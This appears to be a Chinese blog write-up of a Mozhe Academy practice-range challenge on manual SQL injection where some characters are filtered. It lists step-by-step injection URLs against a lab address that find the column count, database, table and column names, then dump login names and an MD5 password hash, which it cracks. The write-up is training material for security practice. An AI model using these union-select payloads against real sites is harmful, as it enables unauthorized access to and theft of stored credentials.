墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)

 手工注入 墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)

使用sqlmap 跑,跑不出表名,所以手工注入

点击进去靶场

域名url为:   http://219.153.49.228:41774/new_list.php?id=1

 

第一步:判断是否有注入点    

http://219.153.49.228:41774/new_list.php?id=1'    出错

http://219.153.49.228:41774/new_list.php?id=1' and 1=1--+   正常   (--+ :  --为注射后面,忽略引号,+为空格)

http://219.153.49.228:41774/new_list.php?id=1‘ and 1=2 --+  为空

判断存在注入点

 

第二步:判断字段数

http://219.153.49.228:41774/new_list.php?id=1' order by 7 --+   正常

http://219.153.49.228:41774/new_list.php?id=1' order by 8 --+   出错

确定字段数为 7

 

第三步:判断数据库名

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,2,3,4,5,6,7--+   确认注入显示位置

 

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,database(),3,4,5,6,7--+   显示数据库名

判断数据库名为 min_ju4t_mel1i

 

第四步: 爆表名

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='min_ju4t_mel1i'--+

表名为 (@dmin9_td4b}

 

第五步:爆列表信息

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}'--+

列表名为 id,username,password,status

 

第六步:爆列表内 登录信息

http://219.153.49.228:41774/new_list.php?id=-1' union select 1,group_concat(username),group_concat(password),group_concat(status),5,6,7 from `(@dmin9_td4b}`--+

选状态为1的登录帐号和密码

既 登录帐号为 mozhe3 ,密码为 210ed648a5d14eb573b8755ceb1af330

密码md5解密 为 807362

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值